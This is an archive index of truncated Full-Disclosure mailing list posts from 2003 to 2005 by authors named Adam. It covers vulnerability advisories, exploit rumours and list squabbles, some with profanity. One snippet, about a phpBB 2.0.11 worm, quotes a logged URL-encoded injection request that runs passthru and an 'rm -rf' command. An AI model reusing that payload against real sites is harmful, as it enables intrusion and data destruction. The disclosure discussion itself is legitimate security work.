Re: [Full-Disclosure] Erasing a hard disk easily

2004-07-13 Thread Adam
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Would you concider donating them to http://www.freetradecampus.com where we would format and load linux on them to give away to needy students? On Monday 12 July 2004 02:49 pm, amilabs wrote: > I have a bunch of old computers I would like to donate.

[Full-Disclosure] (no subject)

2004-07-25 Thread adam
h MS paint what a waist of time there was no real hack involved and no access to any important info. just wondering if anybody else has encountered this nobody? Adam - This mail sent through IMP: http://hor

Re: [Full-Disclosure] (no subject) (try using a friggin subject line...)

2004-09-03 Thread Adam
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 who are you friggen Dr Evil? On Friday 13 August 2004 07:04 pm, KF_lists wrote: > Insert subject here ^ > > -KF > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.nets

Re: [Full-Disclosure] Where is security industry gng??

2004-09-13 Thread Adam
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I believe you missed user EDUCATION? a tools weekest point is ,,, You! as seen by the dork who was surfing the net on a box he was using as a server On Monday 13 September 2004 11:59 am, Harlan Carvey wrote: > > Network security -> application secur

Re: [Full-Disclosure] Severe exploit found, all UNIX are affected!

2004-09-16 Thread Adam
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I met Charlie and I found out his real last name, and that he's been in a lot of very bad stuff not limited to IT and The Big One. (NAM) Charles last name is Sheen just Google "Charlie Sheen" and you'll see what exactly I mean Ad

Re: [Full-Disclosure] SSH Exploit Request

2003-11-13 Thread Adam
ht they where being spied on by the US Gov" off the list it was an old MDK8.1 box I was trying to keep around just a minuet or two longer and didn't have time to patch properly. (My Bad) My 2 cents Adam On Thursday 13 November 2003 01:03 pm, Jeremiah Cornelius wrote: > On T

[Full-Disclosure] (kind of off topic) this book has been writen. is Mitnick a monkey or what?

2004-02-11 Thread adam
ks if you do decide to send stories and if you cover your tracks to well and win the 500.00 prize how are you going to recive the money?? I wonder if he would pay for a storie about defaceing defensivethinking.com Warm reguards, Adam Call for Hackers from Kevin Mitnick http://defensivethinking.com

Re: [Full-Disclosure] Request: Starla Pureheart PE

2004-03-15 Thread Adam
Public forum ... I smell a law suit even if it wasn't directed to anyone. Not that I'm offended but there are girls.. >Ahumm< Women on this list. Adam On Monday 15 March 2004 03:03 pm, Bugtraq Security Systems wrote: > Dear Starla, > > At Bugtraq Security Sys

RE: [Full-Disclosure] Does the Windows AUX bug affect Web servers also?

2003-07-09 Thread Adam
working again. The server didn't crash but paused for a second. Unable to duplicate the previous results. The link had no affect on the server a second time. Adam Richards Network Administrator WorldNet Communications, Inc. 318-213-9827 / Fax 318-213-8534 World Class Technology, Hometown Se

RE: [Full-Disclosure] Red Bull Worm

2003-08-09 Thread Adam
FYI - k-otik released a universal exploit that doesn't need 48 different offsets. It uses 2. One for win2k and one for XP. ( In case noone noticed ) Adam Richards Network Administrator WorldNet Communications, Inc. 318-213-9827 / Fax 318-213-8534 World Class Technology, Hometown Se

[Full-Disclosure] Blaster Side Affect?

2003-08-15 Thread Adam
longer get to any websites. Checked all the settings and they are good. They can ping outside there network and get email through outlook. Just can't browse any websites? Anyone heard of this or why it is happening? Or how to fix it. Any help would be greatly appreciated.

Re: [Full-Disclosure] viruses being sent to this list

2004-03-24 Thread Adam
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I'm finding that the people who complane the most are usually the people who have no business working with Virii and are only as good as there Outlook updates Sorry Gadi, but you where told a long time back to quit when you where only marginally be

Re: [Full-Disclosure] Off-Topic: IKEA ownz Microsoft

2004-04-06 Thread Adam
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SO WTF dose this mean to me or you should IKEA now be a target? I think that Ikea at least dose product tests and sells a stable product with out security flaws or adds **Warnings** about who should use there products and the issues around using pr

Re: [Full-Disclosure] Off-Topic: IKEA ownz Microsoft

2004-04-07 Thread Adam
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Am I the only one who reads directions suppled? (Never A prob with Ikea other than my wife wanting to buy to much when we go) and realize that you get what you pay for (except for Opperating Systems) On Wednesday 07 April 2004 06:34 am, Sean Crawfo

Re: [Full-Disclosure] THCIISSLame exploit

2004-04-22 Thread Adam
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 now this is going to help! Will your hiding behind a yahoo email address then you post this filth to the list and are you gay bashing "are you homophobic?" thats usually the first clue to represion I'm not gay I'm not afraid of gays and I don't fin

Re: [Full-Disclosure] THCIISSLame exploit

2004-04-22 Thread Adam
nt know how to look at > incoming email headers from your AOL mail to see what > ip im coming from.. btw are you hungry? > ...theres plenty to go around > > -illwill > > --- Adam <[EMAIL PROTECTED]> wrote: > > -BEGIN PGP SIGNED MESSAGE- > > Hash: SHA1

Re: [Full-Disclosure] I think some one might have screwed-up

2004-05-07 Thread Adam
reat tool for a project I'm doing and I would personally at least passwd protect it with htaccess so far I'm getting mixed reviews about the potential for using the info on this URL Thank you all for your input thus far. Adam On Friday 07 May 2004 11:38 am, you wrote: > Hello Adam,

[Full-Disclosure] I think some one might have screwed-up

2004-05-06 Thread Adam
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 can some one tell me is this a good thing to leave in public? http://recruiterdirect.com/module_sizes.html -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFAml6QQEDQWvlbVLkRAnYlAJ9u8Ytl56oyhtreDj9qYfioAg9qKwCfTnWw dmGdk8kiIyBXiI

Re: [Full-Disclosure] irc over ssl

2004-05-24 Thread adam
Just because they're using mIRC, doesn't mean that they aren't unix/cisco tech geeks. Ever consider that they might have run Windows on their workstations at work? And even so using the clients that have been ported to Windows might be an even worse idea because of bugs in the ported c

Re: [Full-Disclosure] irc over ssl

2004-05-24 Thread adam
Do you really think that they would be using mIRC if they had unix on their workstations anyways? Maybe reading comprehension isn't one of your best skills. Thanks Again! On Mon, 24 May 2004, adam wrote: Just because they're using mIRC, doesn't mean that they ar

[Full-Disclosure] Re: new phpBB worm affects 2.0.11

2004-12-28 Thread Adam
;rm%20-rf%20coll*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" -Adam Herman Sheremetyev wrote: My patched phpBB 2.0.11 running on FreeBSD 4.10 was exploited by a new variatio

[Full-Disclosure] RE: Yahoo Email Policy "Debate"

2005-01-06 Thread Adam
Some important issues I think that a lot of people are overlooking in this case is that not everything that a person "owns" can be considered estate to be passed on to their next of kin, especially in the case of emails, letters, and other mediums of communication. One of the key differences be

[Full-Disclosure] Re: backdoor menu on conexant chipset dsl router (Zoom X3)

2004-07-08 Thread Adam Laurie
[EMAIL PROTECTED] wrote: Citando Adam Laurie <[EMAIL PROTECTED]>: i have just installed an adsl modem sold under the brand of Zoom X3 http://www.zoom.com/products/adsl_overview.html and was apalled to find that an nmap scan of the external address immediately came up with the following:

Re: [Full-Disclosure] A Popup! In Mozilla!

2004-07-22 Thread Szilveszter Adam
a wrote: does it work with the latest version of mozilla ? 1.7 / 1.7.1 ? Of course it does. Why shouldn't it? Sz. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Physical access exploit: Apple iTunes Visualiser disables screen lock

2004-07-22 Thread Adam Q
the user wishes. Most users (and IT departments) would assume if they had screen locking enabled for their screensaver that they would be safe. iTunes is a registered trademark of Apple Computer Corp. --- Adam Q Salter [EMAIL PROTECTED] ___ Full-Disclo

[Full-Disclosure] Advanced usage of system() function.

2004-08-13 Thread Adam Zabrocki
# ## Advanced usage of system() function ## # 1. Introduction In a last few years a lot of new patches for kernel which improve security became ava

Re: [Full-Disclosure] why o why did NASA do this.

2004-10-17 Thread Adam Jones
The majority of the list had nothing more than alias $name $email Only small parts had any more specific contact information. The emails provided seem to all have been @nasa.gov anyways. (did not actually search for exceptions on this other than eyeballing it) Most likely any mail sent to these a

[Full-Disclosure] J2ME security vulnerabilities

2004-10-22 Thread Adam Gowdiak
efore I could do anything malicious from Java appplication on my phone). I plan to release a research paper with all the details about the flaws including device specific information and some additional material that didn’t fit into my HITB talk, in a couple of months (1Q 2005). Best Regards

Re: [Full-Disclosure] Israeli boffins crack GSM code

2003-09-09 Thread Adam Shostack
ty. This is like the (AT&T?) voice mail frauds that were costing people thousands of dollars for choosing poor passwords for their voice mail. Until it hits a certain level, its just revenue enhancement through poor security. Adam -- "It is se

Re: [Full-Disclosure] Symantec wants to criminalize security info sharing

2003-09-11 Thread Adam Shostack
obvious benefit, we can send Schwartz to jail and break up Symantec under RICO. ;) Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume ___ Full-Disclosure - We bel

Re: [Full-Disclosure] new ssh exploit?

2003-09-15 Thread Adam Shostack
Is privsep on in any of these systems? Do the failed attempts show up in your logs? And naturally, do you have some tcpdumps? Adam On Mon, Sep 15, 2003 at 01:48:34PM -0400, christopher neitzert wrote: | More on this; | | The systems in question are FreeBSD, RedHat, Gentoo, and Debian all

Re: [Full-Disclosure] OpenSSH exploit

2003-09-16 Thread Adam Dyga
| Is there a complete list of vulnerable versions of OpenSSH including | the 2.x branches? In other words how far back does this issue go? Just compare buffer_append_space() function in buffer.c in all versions you are interested in... -- Greets adeon

Re: [Full-Disclosure] openssh remote exploit

2003-09-17 Thread Adam Dyga
There is also one little bug in the code, look below. | | void * | buffer_append_space(Buffer *buffer, u_int len) | { | void *p; | | if (len > 0x10) | fatal("buffer_append_space: len %u not supported", len); | | /* If the buffer is empty, start using it

Re: [Full-Disclosure] Re: new openssh exploit in the wild! * is FAKE AS SH@!*

2003-09-19 Thread Adam Balogh
not connected directly to internet and doesnt relay mails. It doesn't use that special offset as a trigger. We got so many "sys3" accounts in /etc/passwd as many times we ran it plus those outgoing-mails que'd. /Adam Balogh __

Re: [Full-Disclosure] Re: new openssh exploit in the wild! * isFAKE AS SH@!*

2003-09-19 Thread Adam Balogh
Probably a scriptkiddie or some random idiot. The fun part was it came up totally different offsets then i mean TOTALLY different each time you ran it and if you gave it a offset it would "work" no matter what. For those people who ran it.. change all your passwords. :) /Adam Vit

RE: [Full-Disclosure] Re: new openssh exploit in the wild! *isFAKE AS SH@!*

2003-09-22 Thread Adam Balogh
Adam wrote: > Probably a scriptkiddie or some random idiot. The fun part > was it came up totally different offsets then i mean TOTALLY > different each time you ran it and if you gave it a offset it > would "work" no matter what. For those people who ran it.. > cha

Re: [Full-Disclosure] Political Posts

2003-10-05 Thread Adam Dyga
Dnia nie 5. października 2003 18:50, J.A. Terranson napisał: | On Sun, 5 Oct 2003, Eric Scher wrote: | > I DID NOT SUBSCRIBE TO THIS LIST TO READ POLITICAL POSTS. | | Nobody gives a fuck what *you* signed up for. Don't like it? Get the fuck | out. | | This is "Full Disclosure" - *Everything* is d

Re: [Full-Disclosure] Political Posts

2003-10-05 Thread Adam Dyga
Dnia nie 5. października 2003 22:52, J.A. Terranson napisał: | | The so-called "charter" didn't exist when I subscribed. I signed on during | Len's spam run announcement (when he sent, *UNSOLICITED*, every subscriber | to bugtraq a notice that he was starting his little shindig). But now, the ch

Re: [Full-Disclosure] Political Posts

2003-10-05 Thread Adam Dyga
Dnia nie 5. października 2003 18:50, J.A. Terranson napisał: | On Sun, 5 Oct 2003, Eric Scher wrote: | > I DID NOT SUBSCRIBE TO THIS LIST TO READ POLITICAL POSTS. | | Nobody gives a fuck what *you* signed up for. Don't like it? Get the fuck | out. | | This is "Full Disclosure" - *Everything* is d

[Full-Disclosure] Workshop on Cybersecurity, Research & Disclosure

2003-10-08 Thread Adam Shostack
This should be a fascinating get-together. - Forwarded message from Lauren Gelman <[EMAIL PROTECTED]> - Cybersecurity, Research & Disclosure November 22, 2003 Stanford Law School http://cyberlaw.stanford.edu/security/ Stanford Law School's Center for Internet and Society will host a day-

[Full-Disclosure] Re: Do you really think CDs will be protected in future?

2003-10-09 Thread Szilveszter Adam
Hi! Davide Del Vecchio wrote: > I don`t know what you think about this, but in my opinion > will never exist a method to REALLY protect CDs, just because > I think that "if I can ear it, I can reproduce (and record) it". > The dsp could be redirected to hd or this kind of stuff > (just a stupid e

Re: [Full-Disclosure] Re: Do you really think CDs will be protected in future?

2003-10-09 Thread Szilveszter Adam
Jeroen Massar wrote: You mean Sony&Philips selling music through their music labels and also selling a *LOT* of CD and DVD writers ? :) This, and more. Although, AFAIR Philips actually marketed the standalone "audio CD-copy" machine where you had (?) to use special "raw audio CDs" and these cost

Re: [Full-Disclosure] SunnComm to sue 'Shift key' student for $10m

2003-10-09 Thread Adam Dyga
Dnia pią 10. października 2003 00:08, Jeremiah Cornelius napisał: | Ahhh... The wildest, satirical speculations on FullDisclosure come to | fruition in a court of law. Let the games begin! | | http://www.theregister.co.uk/content/6/33322.html | SunnComm to sue 'Shift key' student for $10m | By To

Re: [Full-Disclosure] Re: Do you really think CDs will be protected in future?

2003-10-10 Thread Szilveszter Adam
Phillip R. Paradis wrote: I agree that they do have a case. I think, however, their problems are entirely of their own creation. Yes. 2.) Offer added value. Good artists and managers have known this for a long time. People will more likely buy a record which also has nice artwork, exclusive con

RE: [Full-Disclosure] Application level firewall

2003-10-18 Thread Adam Lydick
any software such as ZA and its brethern lately, so they might be doing some more magic that plugs those holes -- but it seems likely that they cannot fix all of them without patching a great deal of the OS) Just my standard complaints. Cheers. -- Adam Lydick On Sat, 2003-10-18 at 08:19, Andriy

[Full-Disclosure] mod_security 1.7RC1 to 1.7.1 vulnerability

2003-10-28 Thread Adam Dyga
Program:mod_security (www.modsecurity.org) Versions: 1.7RC1 to 1.7.1 (Apache 2 version) Synopsis: malloc based buffer overflow Author: Adam Dyga (adeon(at)o2.pl, ad(at)adsystems.com.pl) URL:http://adsystems.com.pl/adg

[Full-Disclosure] ISV unwilling to provide security patches on Oracle?

2003-11-06 Thread adam morley
wow, that's a dumb vendor, don't use their product" kind of comments, so if you can hold back that would be great. But if you just can't, then I can understand. In the event someone from Oracle is listening, I'd love to be contacted in the event Oracle th

Re: [Full-Disclosure] WinME firewalling

2003-11-09 Thread adam morley
/0,4149,1370707,00.asp http://www.pcmag.com/article2/0,4149,646255,00.asp http://www.pcmag.com/article2/0,4149,646256,00.asp http://www.pcmag.com/article2/0,4149,55367,00.asp One of the software ones in those articles must run on ME (hopefully) -- adam ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] DoS in PureFTPd

2003-11-10 Thread Adam Zabrocki
PureFTPd all versions vulnerability. I. Entry. Vuln are all version deamons PureFTP. There is DoS bug. II. Vulnerability details. Vulnerability function is displayrate(). There is simple overflow bug (DoS): "in file src/ftpd.c" static void displayrate(const char *word, off_t size,

[Full-Disclosure] DoS in PureFTPd - continue.

2003-11-11 Thread Adam Zabrocki
ed is MAXPATHLEN) then function return ENAMETOOLONG. It indemnifies before DoS. Regards Adam Zabrocki (pi3). --- Lenin wciąż żywy? http://film.wp.pl/p/film.html?id=8502 ___ Full-Disclosure - We belie

[Full-Disclosure] Serious flaws in bluetooth security lead to disclosure of personal data

2003-11-11 Thread Adam Laurie
folks, please find attached a disclosure paper on bluetooth. cheers, Adam -- Adam Laurie Tel: +44 (20) 8742 0755 A.L. Digital Ltd. Fax: +44 (20) 8742 5995 The Storeshttp://www.thebunker.net 2 Bath Road http://www.aldigital.co.uk

[Full-Disclosure] Re: Serious flaws in bluetooth security lead to disclosure of personal data

2003-11-14 Thread Adam Laurie
ices, an attitude that seems to have been taken with the Ericsson T610. indeed. however, i'm puzzled as to what you mean about the T610, as we have found it to be one of the vulnerable devices. [snip] cheers, Adam -- Adam Laurie Tel: +44 (20) 8742 0755 A.L. Digital Lt

Re: [Full-Disclosure] visa XSS?

2003-12-23 Thread Adam Hunt
and hosting for them because of the downtime probs and security issues that nac.net is continually plagued with and I usually save the clients between 50 and 75 % of there yearly bill with better service. I'm just righting this to poke the nose of nac.net. Adam On Tuesday 23 December 2

Re: [Full-Disclosure] visa XSS?

2003-12-23 Thread Adam Hunt
ode: 07054 > Country:US > > > Am I missing something? > > -Original Message- > From: Adam Hunt [mailto:[EMAIL PROTECTED] > Sent: Wednesday, 24 December 2003 3:29 > To: [EMAIL PROTECTED]; Mauro Flores > Cc: [EMAIL PROTECTED] > Subject: Re: [Full-Disclosur

Re: [Full-Disclosure] visa XSS?

2003-12-24 Thread Adam Hunt
y states: > > OrgName:Net Access Corporation > OrgID: NAC > Address:1719 STE RT 10E > Address:Suite 111 > City: Parsippany > StateProv: NJ > PostalCode: 07054 > Country:US > > > Am I missing something? > > -Original Message-

[Full-Disclosure] Re: Reverse Engineering thoughts

2004-01-07 Thread Adam Tuliper
Some companies consider reverse engineering to be a violation of their product licensing, so doing this may be going against their rules to begin with. I believe there have been several legal cases relating to items like this (decss being one of them in a sense of reverse engineering). Considering

[Full-Disclosure] 0verkill - little simple vulnerability.

2004-02-01 Thread Adam Zabrocki
0verkill - little simple vulnerability. I. Entry. Vulnerability is game 0verkill. There is some little bugs in clinet / server. II. Vulnerability details. a) client: Vulnerability function is load_cfg(), save_cfg() and maybe send_message(). There is simple buffer overflow bugs: "

Re: [Full-Disclosure] Interesting side effect of the new IE patch

2004-02-06 Thread Szilveszter Adam
b hosting firm that also pushed these "@-URLs" to customers telling them how cute it would be to have the same web address as their email addy was... (like http://[EMAIL PROTECTED]) I do not know how successful it was but hope not very... have not seen the ad lately. Regards: Sz. -- *

Re: [Full-Disclosure] Interesting side effect of the new IE patch

2004-02-06 Thread Szilveszter Adam
[While others have already commented, I cannot resist] Stefan Esser wrote: Ohh yes and I choose the word standard, because standard is not what some RFC/paper dictates, but what the majority of people (or browsers) use (support). Huh. This is what's called an "industry standard" and does not hav

Re: [Full-Disclosure] Interesting side effect of the new IE patch

2004-02-06 Thread Szilveszter Adam
rhetorical question wrote: Hello, I *may* be wrong. But I do believe the "http://username:[EMAIL PROTECTED] " bit has been around for some time. I remember finding that out a long time ago, which was convient in regards to browsing FTP sites which require a login/ password. Was using Netscap

[Full-Disclosure] Apache-SSL security advisory - apache_1.3.28+ssl_1.52 and prior

2004-02-06 Thread Adam Laurie
ee http://www.apache-ssl.org/). Credits --- This vulnerability was found and reported by Wietse Venema. cheers, Adam -- Adam Laurie Tel: +44 (20) 8742 0755 A.L. Digital Ltd. Fax: +44 (20) 8742 5995 The Storeshttp://www.thebunker.net 2 Bath Road

Re: [Full-Disclosure] Proofpoint Protection Server remote MySQL r oot user vulnerability

2004-02-23 Thread Szilveszter Adam
Tony Kava wrote: Are you sure this is the default behaviour of a Red Hat installation? Your advisory does not indicate any specific version(s) of Red Hat Linux. Is this supposed to apply to RHL 7.2? 7.3? 8.0? 9.0? Fedora 1? In my previous experience with the 'mysql-server' package on any Red Hat

Re: [Full-Disclosure] E-mail spoofing countermeasures (Was: Backdoor not recognized by Kaspersky)

2004-03-04 Thread Szilveszter Adam
Maybe I should know better, but I can't resist... Bill Royds wrote: Having a MS record would not eliminate spam coming from users validated on the sending server, but it would identify the server that it comes from as "knowing" the sender name. Compromised client boxes would need to use the ISP

Re: AW: [Full-Disclosure] Zone Alarm

2003-06-06 Thread Adam Lydick
27;t think I need to say any more about that... Cheers, Adam On Thu, 2003-06-05 at 06:31, Shawn McMahon wrote: > On Wed, Jun 04, 2003 at 08:37:50PM -0700, morning_wood said: > > > > you must have really crappy admin if you need per application blocking > > ( hint: kill the p

[OT] software license costs - Re: [Full-Disclosure] The Two Facesof Foundstone

2003-06-12 Thread Adam Lydick
gt; > lawyers > > say some software has since been deleted from the company's servers, > > but maintain that anything deleted would still be on backup tapes. > > > > It will be harder to delete Foundstone's tarnished reputation. > > Ex-employees > > are piling on, telling FORTUNE that Kurtz and McClure took credit for > > other people's work and created an unusually harsh office environment. > > (There are even allegations that Foundstone's Ultimate Hacking classes > > were a ripoff of the Extreme Hacking classes its founders ran at Ernst > > & Young in the 1990s.) In doing so, they are shedding light on a bunch > > of executives who seem to have believed their press clips--Fast Company > > recently named Kurtz one of its 50 champions of innovation--and somehow > > got lost along the way. > > > > > > . > > > > > > > > > > > > Concerned about your privacy? Follow this link to get > > FREE encrypted email: https://www.hushmail.com/?l=2 > > > > Free, ultra-private instant messaging with Hush Messenger > > https://www.hushmail.com/services.php?subloc=messenger&l=434 > > > > Big $$$ to be made with the HushMail Affiliate Program: > > https://www.hushmail.com/about.php?subloc=affiliate&l=427 > > ___ > > Full-Disclosure - We believe in it. > > Charter: http://lists.netsys.com/full-disclosure-charter.html > > -- Adam Lydick <[EMAIL PROTECTED]> ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] ExploitLabs - URGENT 0day Alert!!

2003-06-16 Thread Szilveszter Adam
Roy S. Rapoport wrote: On Tue, Jun 17, 2003 at 03:31:25AM +, Donnie Weiner wrote: -- EXPL-NOTHCKR-A1-31337-2003-00010 exploitlabs.com Advisory 0010 --

Re: [Full-Disclosure] Symantec Change Posting Criteria (was Re: Administrivia)

2003-07-07 Thread Adam Shostack
the view he's taken on obvious versus non-obvious pseudonyms. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Novell GroupWise 6.5 Clear Text Vulnerability

2003-07-31 Thread Adam Gray
taken on the basis of the information provided within. Dissemination of this information is granted provided it is presented in its entirety. Modifications may not be made without the explicit permission of Novacoast. Adam Gray CTO Novacoast, Inc. [EMAIL PROTECTED] http://www.nova

[Full-Disclosure] [VulnWatch] Novell GroupWise 6.5 Clear Text Vulnerability

2003-08-01 Thread Adam Gray
taken on the basis of the information provided within. Dissemination of this information is granted provided it is presented in its entirety. Modifications may not be made without the explicit permission of Novacoast. Adam Gray CTO Novacoast, Inc. [EMAIL PROTECTED] http://www.nova

Re: [Full-Disclosure] Call for discussion

2003-08-14 Thread Szilveszter Adam
Jason Coombs wrote: A closed source database application offering known good hashes and forensic details of files published by vendors... These people are headed in a positive direction, but the closed source part bothers me for some reason. <...huge snip...> Of course I was not surprised to see t

Re: [Full-Disclosure] JAP back doored

2003-08-22 Thread Adam Shostack
how easy traffic analysis is for them. Is there a political motive? Are we about to see legal attacks on high latency mixes? Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume ___

Re: [Full-Disclosure] JAP back doored

2003-08-22 Thread Adam Shostack
On Fri, Aug 22, 2003 at 06:28:26PM +0200, Rainer Gerhards wrote: | > There is no exponential term in MIX traffic. That means that if you | > try to ensure that all traffic leaves the network quickly (so you can | > say, web browse), then your attacker only needs to analyze traffic | > over a few s

Re: [Full-Disclosure] Re: Microsoft Coding / National Security Risk

2004-03-29 Thread Szilveszter Adam
madsaxon wrote: The US military is considerably more rigorous than the civilian government in this regard, but even then there are systems which have slipped through the cracks. Evidence for this is the fact that Web defacement mirrors still occasionally contain both .gov and .mil entries. Not to

Re: [Full-Disclosure] Security Hole in HTTP (RFC1945) - Browser-Spoofing

2004-03-31 Thread Szilveszter Adam
Ron Stiemer wrote: Hi List, can anybody confirm this, or is it just an april's fool joke ? Yes, I can confirm this. After all, I have been "on air" with such a spoofed browser authentication :-) string for years now, making website statistcs software cry and webmasters scratch their heads. (FWI

Re: [Full-Disclosure] April 1st is here (joy). now improved

2004-03-31 Thread Szilveszter Adam
Kurt Seifried wrote: If you're going to pull an Apil 1st hoax it's gotta be a bit less obvious then this. Although I have no doubt this will send at least a few list members into dizzying heights of excitement (I suppose it's cheaper then a subscription to playboy ;). Well if we are into folly any

Re: [Full-Disclosure] Wiretap or Magic Lantern?

2004-04-07 Thread Szilveszter Adam
Hello all, As for the "Magic Lantern" stuff, yes AFAIR it was like your typical malware, was delivered eg via email and did pretty much the same stuff that today's keystroke-logging remote-controllable malware does. Nothing truly exciting, not even at the time, but for the fact that it was the

Re: [Full-Disclosure] On PGP (was: Wiretap or Magic Lantern?)

2004-04-08 Thread Szilveszter Adam
Hello, Thanks Tamas, I really got a kick out of the article. Especially your last paragraph, which really underscores my previous point: no need to go against the crypto head-on (although doing it anyway and suceeding is certainly nice, even if you only find some unimportant info like the love

Re: [Full-Disclosure] Wiretap or Magic Lantern?

2004-04-08 Thread Szilveszter Adam
Although this thread has now been more of a "full-discourse" :-) than anything else, let me add a few points here: The fact that there is some advanced technology that we know (and may be some more that we don't know) about for text gathering and analysis and the fact that huge databases can be

Re: [Full-Disclosure] Vulnerability response times -- MS and others

2004-04-08 Thread Szilveszter Adam
hggdh wrote: Anyways... the report seems to indicate that Microsoft is the fastest on solving security issues. Comments? While not reading the report does not allow me to make qualified comments (and the statements for/by the press that are to be quoted in the news headlines are to be taken with

Re: [Full-Disclosure] Passwords for Chocolate!

2004-04-21 Thread Szilveszter Adam
Jeremiah Cornelius wrote: "All because the Lady loves Milk Tray..." The BBC has an article about users giving up their passwords for chocolate. Hehehehe, I really got a kick outta this. It really goes a long way to show why you do *not* need to go very fancy with technology to eg attack strong c

[Full-Disclosure] Apache - all versions vulnerability in OLD procesors.

2004-04-24 Thread Adam Zabrocki
Apache - all versions vulnerability in OLD procesors. I. Entry. Vulnerability in probably all versions of apache web server, default install (as of version 1.3.29). II. Vulnerability details. There are few scenarios, few calls leading to that bug. The first call is in mod_auth,

Re: [Full-Disclosure] iDEFENSE: Security Whitepaper on Trusted Computing Platforms

2004-05-10 Thread Szilveszter Adam
Richard Johnson wrote: iDEFENSE: The Power of Intelligence : Current Intelligence Report iSecurity Brief 05.10.04: Why OpenBSD is more secure than Linux Author: Richard Johnson, the DataThief <...> Yawn. I hope Kurt enjoyed reading his years-old article under a different person's name. Plagiaris

Re: [Full-Disclosure] Re: Cisco's stolen code

2004-05-26 Thread Adam Szilveszter
Aditya, ALD [Aditya Lalit Deshmukh] wrote: are there any lawayers on the list who can confirm / deny this ? or any other list where i can ask this. this has started to get intresting from the legal point of view ! No specific comments on the USC section cited (because, although it is often forgo

Re: [Full-Disclosure] weather.com contact

2004-06-07 Thread Szilveszter Adam
Michal Zalewski wrote: On Fri, 4 Jun 2004 [EMAIL PROTECTED] wrote: Anyone know anyone at weather.com? No, but I must share that I am perhaps for the first time on this list truly scared of what you might have discovered. A weather control exploit? No, I was first to discover this, but problem is

Re: [Full-Disclosure] [Fwd: Caveat Lector: Beastie Boys Evil]

2004-06-18 Thread Szilveszter Adam
Eric Paynter wrote: The sad part about this entire topic is the futility of attempting to copy protect in the first place. So they install some software and Mac and Win... then some Linux kiddie rips the CD and puts it on P2P and it's out now for the whole world. All it takes is one person to break

Re: [Full-Disclosure] [Fwd: Caveat Lector: Beastie Boys Evil]

2004-06-23 Thread Szilveszter Adam
Fetch, Brandon wrote: Similarly - what's to keep someone from using their digital out form their home audio equipment to send the bits to their digital in on their computer? Viola! 'Correct' digital bit stream that is now on the PC to do with as they wish. I haven't verified this but would presume

Re: [Full-Disclosure] Sandeep Sengupta has invited you to open a Gmail account

2004-06-30 Thread Szilveszter Adam
Sandeep Sengupta wrote: Sandeep Sengupta has invited you to open a free Gmail account. Thank you, thank you, thank you! It was very generous of you to think of us! Perhaps the list indeed needs a gmail account... although given the amount of drivel^H^H^H^Hdiscussion going on, we would probably

Re: [Full-Disclosure] HP urges users to erase Netscape to avoid security problems

2004-07-05 Thread Szilveszter Adam
Barry Fitzgerald wrote: Heh. The article has the following quote: "On other platforms, such as Linux, Unix and the Mac, Explorer is less of a threat." Uhh... yeah, you could say that it's less of a threat on GNU/Linux and Unix... non-existance will do that. Ummm, perhaps people have a short atte

[Full-Disclosure] backdoor menu on conexant chipset dsl router (Zoom X3)

2004-07-06 Thread Adam Laurie
s that blackhole any incoming connections. this appears to work. connexant list several other high profile retail modem manufacturers and pc oems, so i leave it as an exercise for the reader to work out other manufacturer/vulnerability combinations. http://www.conexant.com/support/md_supportlinks.h

Re: [Full-Disclosure] Your account at Wells Fargo has been suspended (Phishing Scam)

2004-07-07 Thread Szilveszter Adam
Hi, [Since phishing seems to be all the rage today, I feel compelled to add...] Babak Pasdar wrote: We have uncovered a phishing scam. This is a perfect example of a phishing scam. All indicators (that the recipient sees) show a valid and legitimate e-mail from Wells Fargo. This e-mail tells the

[Full-Disclosure] (no subject)

2004-11-25 Thread Adam Zabrocki
Name: Atari800 Vendor URL: http://atari800.sourceforge.net/ Author: Adam Zabrocki <[EMAIL PROTECTED]> Date: November 20, 2004 Issue: Atari800 - free and portable Atari800/XL/XE/5200 emulator

[Full-Disclosure] Atari800 - local root.

2004-11-25 Thread Adam Zabrocki
Name: Atari800 Vendor URL: http://atari800.sourceforge.net/ Author: Adam Zabrocki <[EMAIL PROTECTED]> Date: November 20, 2004 Issue: Atari800 - free and portable Atari800/XL/XE/5200 emulator

Re: [Full-Disclosure] If Lycos can attack spammer sites, can we all start doing it?

2004-12-02 Thread Adam Challis
rman and EU laws are relevant to MLNS? Adam

[Full-Disclosure] RE: NetWare Screensaver Authentication Bypass From The Local Console

2004-12-16 Thread Adam Gray
that gets fixed. It is after all a voluntary patch. If you do not think it is a vulnerability don't apply the patch. There are some other nice enhancements in the ICSA Compliance kit that may be worth looking into. Adam Gray On Wed, 2004-12-15 at 09:02 +1030, Geoff Vass wrote: > Unp

[Full-Disclosure] NetWare Screensaver Authentication Bypass From The Local Console

2004-12-12 Thread Adam Gray
Novacoast. Adam Gray CTO Novacoast, Inc. agray_at_novacoast.com http://www.novacoast.com signature.asc Description: This is a digitally signed message part ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full

[Full-Disclosure] Bluetooth: BlueSnarf and BlueBug Full Disclusore

2004-12-31 Thread Adam Laurie
